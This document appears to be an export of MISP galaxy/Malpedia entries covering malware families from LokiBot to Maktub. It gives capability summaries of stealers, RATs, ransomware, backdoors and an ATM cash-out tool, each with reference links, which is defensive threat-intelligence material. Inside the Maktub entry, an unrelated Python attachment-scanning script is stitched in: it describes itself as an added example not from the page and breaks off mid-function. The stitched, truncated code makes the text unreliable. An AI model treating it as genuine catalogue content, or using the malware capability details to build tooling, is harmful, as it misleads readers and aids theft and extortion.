https://malcat.fr/blog/reversing-a-nsis-dropper-using-quick-and-dirty-shellcode-emulation/

https://www.atomicmatryoshka.com/post/malware-headliners-lokibot

https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf

https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/

http://reversing.fun/reversing/2021/06/08/lokibot.html

https://www.youtube.com/watch?v=N0wAh26wShE

https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850

https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://securityintelligence.com/posts/roboski-global-recovery-automation/

http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html

https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/

https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/

https://malcat.fr/blog/statically-unpacking-a-simple-net-dropper/

https://www.lastline.com/blog/password-stealing-malware-loki-bot/

https://isc.sans.edu/diary/24372

https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros

https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html

https://news.sophos.com/en-us/2020/05/14/raticate/

https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/

https://www.youtube.com/watch?v=K3Yxu_9OUxU

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations

https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html

https://securelist.com/loki-bot-stealing-corporate-passwords/87595/

http://www.malware-traffic-analysis.net/2017/06/12/index.html

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files

https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/

https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads

Lokorrito

According to ESET, this is a banking trojan that was active mainly in Mexico until the beginning of 2020, with builds for Brazil, Chile, and Colombia also having been identified.

The tag is: misp-galaxy:malpedia="Lokorrito"

Lokorrito is also known as:

Table 3910. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lokorrito

https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/

LONGWATCH

The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.

The tag is: misp-galaxy:malpedia="LONGWATCH"

LONGWATCH is also known as:

Table 3912. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch

https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae

looChiper

LooChiper is a ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thanks to the term “Cipher”) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straightforward, not very different from those belonging to many other ransomware families.

The tag is: misp-galaxy:malpedia="looChiper"

looChiper is also known as:

Table 3913. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper

L0rdix

L0rdix is a multipurpose .NET remote access tool (RAT) first discovered being sold on underground forums in November 2018. Out of the box, L0rdix supports eight commands, although custom commands can be defined and added. These include:

  • Download and execute

  • Update

  • Open page (visible)

  • Open page (invisible)

  • Cmd

  • Kill process

  • Upload file

  • HTTP Flood

L0rdix can extract credentials from common web browsers and steal data from crypto wallets and a target’s clipboard. Optionally, L0rdix can deploy a cryptominer (XMRig) to its bots.

The tag is: misp-galaxy:malpedia="L0rdix"

L0rdix is also known as:

  • lordix

Table 3915. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix

https://blog.ensilo.com/l0rdix-attack-tool

https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py

https://www.bromium.com/decrypting-l0rdix-rats-c2/

https://twitter.com/hexlax/status/1058356670835908610

https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/

Lorenz

Tesorion describes Lorenz as a ransomware with design and implementation flaws, leading to impossible decryption with tools provided by the attackers. A free decryptor for 2021 versions was made available via the NoMoreRansom initiative. A new version of the malware was discovered in March 2022, for which a free decryptor was again provided, while the ransomware operators are not able to provide tools to decrypt affected files.

The tag is: misp-galaxy:malpedia="Lorenz"

Lorenz is also known as:

Table 3916. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz

https://therecord.media/free-decrypter-available-for-lorenz-ransomware/

https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/

https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware

https://arcticwolf.com/resources/blog/lorenz-ransomware-getting-dumped/

https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/

https://twitter.com/AltShiftPrtScn/status/1423190900516302860?s=20

https://www.tesorion.nl/en/posts/lorenz-ransomware-rebound-corruption-and-irrecoverable-files/

https://www.bleepingcomputer.com/news/security/meet-lorenz-a-new-ransomware-gang-targeting-the-enterprise/

Loup

Frank Boldewin describes Loup as a small CLI tool to cash out NCR devices (ATM).

The tag is: misp-galaxy:malpedia="Loup"

Loup is also known as:

Table 3917. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.loup

https://twitter.com/Arkbird_SOLG/status/1295396936896438272

https://twitter.com/r3c0nst/status/1295275546780327936

LOWBALL

LOWBALL uses the legitimate Dropbox cloud-storage service to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.

The tag is: misp-galaxy:malpedia="LOWBALL"

LOWBALL is also known as:

Table 3918. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/

https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/

LPEClient

LPEClient is an HTTP(S) downloader that expects two command line parameters: an encrypted string containing two URLs (a primary and a secondary C&C server), and the path on the victim’s file system to store the downloaded payload.

It sends detailed information about the victim’s environment, like computer name, type and number of processors, computer manufacturer, product name, major and minor Windows versions, architecture, memory information, installed security software and the version of the ntoskrnl.exe from its version-information resource.

LPEClient uses specific 32-bit values to represent its execution state (0x59863F09 when connecting via the WinHTTP interface, 0xA9348B57 via WinINet), or the nature of HTTP requests to the C&C servers (0xF07D6B34 when sending system information, 0xEF8C0D51 when requesting a DLL payload, 0xCB790A25 when reporting the successful loading of the DLL, 0xD7B20A96 when reporting the state of the DLL execution). As the final step, the malware looks for the export CloseEnv and executes it.

The tag is: misp-galaxy:malpedia="LPEClient"

LPEClient is also known as:

  • LPEClientTea

Table 3921. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lpeclient

https://securelist.com/unveiling-lazarus-new-campaign/110888/

https://securelist.com/lazarus-threatneedle/100803/

https://vblocalhost.com/uploads/VB2021-Lee-etal.pdf

https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

https://vblocalhost.com/uploads/VB2021-Park.pdf

https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf

lsassDumper

This Go-written malware is an lsass process memory dumper, which was custom-developed by threat actors according to Security Joes. It has the capability to automatically exfiltrate the results to the free file transfer service "transfer.sh".

The tag is: misp-galaxy:malpedia="lsassDumper"

lsassDumper is also known as:

Table 3922. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lsassdumper

https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/

https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf

Lu0Bot

According to PCrisk, Lu0bot is malicious software. The malware is lightweight, so its use of system resources is low. This complicates the detection of Lu0bot, since it does not cause significant symptoms, such as a severe decrease in system performance.

The malicious program works as a telemetry collector.

The tag is: misp-galaxy:malpedia="Lu0Bot"

Lu0Bot is also known as:

Table 3923. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lu0bot

https://bazaar.abuse.ch/browse/tag/Lu0Bot/

https://embee-research.ghost.io/practical-signatures-for-identifying-malware-with-yara/

Luca Stealer

According to PCRisk, the Luca stealer can extract a variety of information from compromised machines. It targets data related to the following: operating system, device name, CPUs, desktop environment, network interface, user account name, preferred system language, running processes, etc.

This malicious program can steal information from over thirty Chromium-based browsers. From these applications, Luca can obtain Internet cookies, account log-in credentials (usernames/passwords), and credit card numbers. Additionally, the stealer can extract data from password manager and cryptowallet browser extensions compatible with over twenty browsers.

This malware also targets various messaging applications like Telegram, Discord, ICQ, Skype, Element, etc. It likewise aims to acquire information from gaming-related software such as Steam and Uplay (Ubisoft Connect). Furthermore, some versions of Luca can take screenshots and download the files stored on victims' devices.

The tag is: misp-galaxy:malpedia="Luca Stealer"

Luca Stealer is also known as:

Table 3925. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.luca_stealer

https://blogs.blackberry.com/en/2022/08/luca-stealer-targets-password-managers-and-cryptocurrency-wallets

Lumma Stealer

Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim’s machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.

The tag is: misp-galaxy:malpedia="Lumma Stealer"

Lumma Stealer is also known as:

  • LummaC2 Stealer

Table 3928. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx

https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks

https://www.intrinsec.com/lumma_stealer_actively_deployed_in_multiple_campaigns/

https://twitter.com/sekoia_io/status/1572889505497223169

https://twitter.com/fumik0_/status/1559474920152875008

https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/

https://www.youtube.com/watch?v=lmMA4WYJEOY

https://medium.com/s2wblog/lumma-stealer-targets-youtubers-via-spear-phishing-email-ade740d486f7

https://www.esentire.com/blog/the-case-of-lummac2-v4-0

https://twitter.com/Ishusoka/status/1614028229307928582

https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11

https://outpost24.com/blog/everything-you-need-to-know-lummac2-stealer

https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer

https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/

LunchMoney

An uploader that can exfiltrate files to Dropbox.

The tag is: misp-galaxy:malpedia="LunchMoney"

LunchMoney is also known as:

Table 3929. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney

https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html

https://twitter.com/MrDanPerez/status/1097881406661902337

Lurk

The tag is: misp-galaxy:malpedia="Lurk"

Lurk is also known as:

Table 3930. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk

https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader

Luzo

The tag is: misp-galaxy:malpedia="Luzo"

Luzo is also known as:

Table 3931. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo

Lyceum .NET DNS Backdoor

This .NET malware is used as a backdoor over the DNS protocol by a state-sponsored threat actor. It implements additional capabilities (e.g. execution of commands, taking screenshots, listing files/directories/installed applications, and uploading/downloading/execution of files). There are also variants using HTTP (.NET) and one written in Golang.

The tag is: misp-galaxy:malpedia="Lyceum .NET DNS Backdoor"

Lyceum .NET DNS Backdoor is also known as:

Table 3932. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lyceum_dns_backdoor_dotnet

https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor

https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/

Lyceum .NET TCP Backdoor

This .NET malware is used as a backdoor over the HTTP protocol by a state-sponsored threat actor. It implements additional capabilities (e.g. execution of commands, taking screenshots, listing files/directories/installed applications, and uploading/downloading/execution of files). There are also variants using DNS (.NET) and one written in Golang.

The tag is: misp-galaxy:malpedia="Lyceum .NET TCP Backdoor"

Lyceum .NET TCP Backdoor is also known as:

Table 3933. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lyceum_http_backdoor_dotnet

https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/

Lyceum Golang HTTP Backdoor

This Golang-written malware is used as a backdoor over the HTTP protocol by a state-sponsored threat actor (TA). The backdoor runs in a loop of three stages:

  • Check the connectivity

  • Registration of the victim

  • Retrieval and execution of commands

This TA also uses .NET backdoor variants utilizing HTTP and DNS.

The tag is: misp-galaxy:malpedia="Lyceum Golang HTTP Backdoor"

Lyceum Golang HTTP Backdoor is also known as:

Table 3934. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lyceum_http_backdoor_golang

https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/

M00nD3V Logger

According to Zscaler, M00nD3V Logger has the ability to steal confidential information, such as browser passwords, FTP client passwords, email client passwords, DynDNS credentials, JDownloader credentials; capture Windows keystrokes; and gain access to the webcam and hook the clipboard. In all, it has the ability to steal passwords from 42 applications.

The tag is: misp-galaxy:malpedia="M00nD3V Logger"

M00nD3V Logger is also known as:

Table 3936. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.m00nd3v

https://www.zscaler.com/blogs/research/deep-dive-m00nd3v-logger

Machete

According to ESET, Machete’s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64‑encoded text that corresponds to AES‑encrypted strings. GoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence. Regarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it’s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL. The GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.

The tag is: misp-galaxy:malpedia="Machete"

Machete is also known as:

  • El Machete

Table 3940. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.machete

https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html

https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html

https://securelist.com/el-machete/66108/

https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/

https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6

https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america

https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf

MadMax

The tag is: misp-galaxy:malpedia="MadMax"

MadMax is also known as:

Table 3941. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax

Magala

The tag is: misp-galaxy:malpedia="Magala"

Magala is also known as:

Table 3942. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.magala

https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/

Maggie

According to DCSO, this malware is written as an Extended Stored Procedure for a MSSQL server. The backdoor has capabilities to bruteforce logins to other MSSQL servers, adding a special hardcoded backdoor user in the case of successfully bruteforcing admin logins.

The tag is: misp-galaxy:malpedia="Maggie"

Maggie is also known as:

Table 3943. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie

https://medium.com/@DCSO_CyTec/tracking-down-maggie-4d889872513d

https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/

https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01

MagicRAT

According to Talos, MagicRAT is programmed in C++ programming language and uses the Qt Framework by statically linking it to the RAT on 32- and 64-bit versions. The Qt Framework is a programming library for developing graphical user interfaces, of which this RAT has none. Talos thinks that the objective was to increase the complexity of the code, thus making human analysis harder. On the other hand, since there are very few examples (if any) of malware programmed with Qt Framework, this also makes machine learning and heuristic analysis detection less reliable. The RAT uses the Qt classes throughout its entire code. The configuration is dynamically stored in a QSettings class eventually being saved to disk, a typical functionality provided by that class.

MagicRAT provides the operator with a remote shell on the victim’s system for arbitrary command execution, along with the ability to rename, move and delete files on the endpoint. The operator can determine the timing for the implant to sleep, change the C2 URLs and delete the implant from the infected system.

The tag is: misp-galaxy:malpedia="MagicRAT"

MagicRAT is also known as:

Table 3944. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat

https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF

https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/

https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html

https://www.youtube.com/watch?v=nUjxH1gW53s

Magniber

According to TXOne, the Magniber ransomware was first identified in late 2017 when it was discovered using the Magnitude Exploit Kit to conduct malvertising attacks against users in South Korea. However, it has remained active since then, continually updating its tactics by employing new obfuscation techniques and methods of evasion. In April 2022, Magniber gained notoriety for disguising itself as a Windows update file to lure victims into installing it. It then began spreading via JavaScript in September 2022.

The tag is: misp-galaxy:malpedia="Magniber"

Magniber is also known as:

Table 3945. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber

https://www.bleepingcomputer.com/news/security/magniber-ransomware-gang-now-exploits-internet-explorer-flaws-in-attacks/

https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/

https://www.malwarebytes.com/blog/news/2018/07/magniber-ransomware-improves-expands-within-asia

https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/

https://asec.ahnlab.com/en/30645/

https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/

https://asec.ahnlab.com/en/41889/

http://asec.ahnlab.com/1124

https://threatresearch.ext.hp.com/magniber-ransomware-switches-to-javascript-targeting-home-users-with-fake-software-updates/

https://asec.ahnlab.com/en/19273/

https://teamt5.org/tw/posts/internet-explorer-the-vulnerability-ridden-browser/

https://www.youtube.com/watch?v=lqWJaaofNf4

https://hshrzd.wordpress.com/2023/03/30/magniber-ransomware-analysis/

https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/

https://therecord.media/printnightmare-vulnerability-weaponized-by-magniber-ransomware-gang/

https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/

https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372

https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/

https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/

https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware

https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer

Mailto

The tag is: misp-galaxy:malpedia="Mailto"

Mailto is also known as:

  • Koko Ransomware

  • NetWalker

Table 3946. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf

https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html

https://www.youtube.com/watch?v=q8of74upT_g

https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/

https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million

https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/

https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf

https://lopqto.me/posts/automated-dynamic-import-resolving

https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers

https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.ic3.gov/media/news/2020/200929-2.pdf

https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf

https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware

https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html

https://zero2auto.com/2020/05/19/netwalker-re/

https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/

https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas

https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html

https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/

https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/

https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf

https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware

https://www.justice.gov/usao-mdfl/press-release/file/1360846/download

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://sites.temple.edu/care/ci-rw-attacks/

https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware

https://0x00-0x7f.github.io/Netwalker-from-Powershell-reflective-loader-to-injected-Dll/

https://s3.documentcloud.org/documents/21199896/vachon-desjardins-court-docs.pdf

https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/

https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/

https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/

https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://zengo.com/bitcoin-ransomware-detective-ucsf/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/

MakLoader

The tag is: misp-galaxy:malpedia="MakLoader"

MakLoader is also known as:

Table 3950. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader

https://twitter.com/James_inthe_box/status/1046844087469391872

Makop

According to BeforeCrypt, MAKOP ransomware first appeared in 2020 as an offshoot of the PHOBOS variant and has infected a number of computers since then. Files encrypted by MAKOP often carry the extension ".makop", and the desktop wallpaper may also be changed. MAKOP uses RSA encryption; no free decryption tool capable of recovering files encrypted by MAKOP is known.

The tag is: misp-galaxy:malpedia="Makop"

Makop is also known as:

Table 3951. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.makop

https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/

https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware

https://lifars.com/wp-content/uploads/2021/08/Makop-Ransomware-Whitepaper-case-studyNEW-1.pdf

https://twitter.com/siri_urz/status/1221797493849018368

https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11

Maktub

According to PCrisk, Maktub is ransomware distributed via zipped Word documents. Once the archive is extracted and the document opened, Maktub infiltrates the system and encrypts files stored on the victim's computer. Maktub adds a .NORV, .gyul or other random extension to each encrypted file, which makes it straightforward to determine which files have been encrypted.
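The delivery vector described above (a Word document inside a zip attachment) is the kind of thing a mail gateway or triage script can check before a user ever opens the file. The following Python is an added example and is not from the page, PCrisk or the Maktub analyses linked below: it unpacks a zipped attachment, looks inside any OOXML Word document for a VBA project part, and flags packages that are not valid zips at all. The page does not state that Maktub's lures used macros; treating a VBA project as the quarantine trigger is this example's assumption, and both sample archives (including the file name `Invoice_2016.docm`) are constructed here.

```python
"""Inspect a zipped e-mail attachment for Office documents carrying a VBA project.

Added example: the archives are constructed here; the sample does not
reproduce a Maktub lure, and the page does not state that Maktub's
documents used macros, so the VBA check is this example's assumption of
what a gateway should look for.
"""
import io
import zipfile
from typing import List

OOXML_WORD = (".docx", ".docm", ".dotm", ".dotx")   # Word packages are zips
VBA_PART = "word/vbaproject.bin"                     # present only with macros


def inspect_zip_attachment(zip_bytes: bytes) -> List[dict]:
    """Return one record per entry of the outer zip."""
    records = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as outer:
        for info in outer.infolist():
            name = info.filename
            lower = name.lower()
            rec = {"name": name, "word_document": lower.endswith(OOXML_WORD),
                   "has_vba": False, "malformed": False, "size": info.file_size}
            if rec["word_document"]:
                data = outer.read(name)
                try:
                    with zipfile.ZipFile(io.BytesIO(data)) as doc:
                        parts = {n.lower() for n in doc.namelist()}
                        rec["has_vba"] = VBA_PART in parts
                except zipfile.BadZipFile:
                    # A .docx that is not a zip is either corrupt or a
                    # renamed payload; either way it should not pass.
                    rec["malformed"] = True
            records.append(rec)
    return records


def should_quarantine(records: List[dict]) -> bool:
    """Quarantine when any Word document carries VBA or is not a valid package."""
    return any(r["has_vba"] or r["malformed"] for r in records)


def _zip_of(entries: dict) -> bytes:
    """Build an in-memory zip from {name: bytes}."""
    buf = io.BytesIO()
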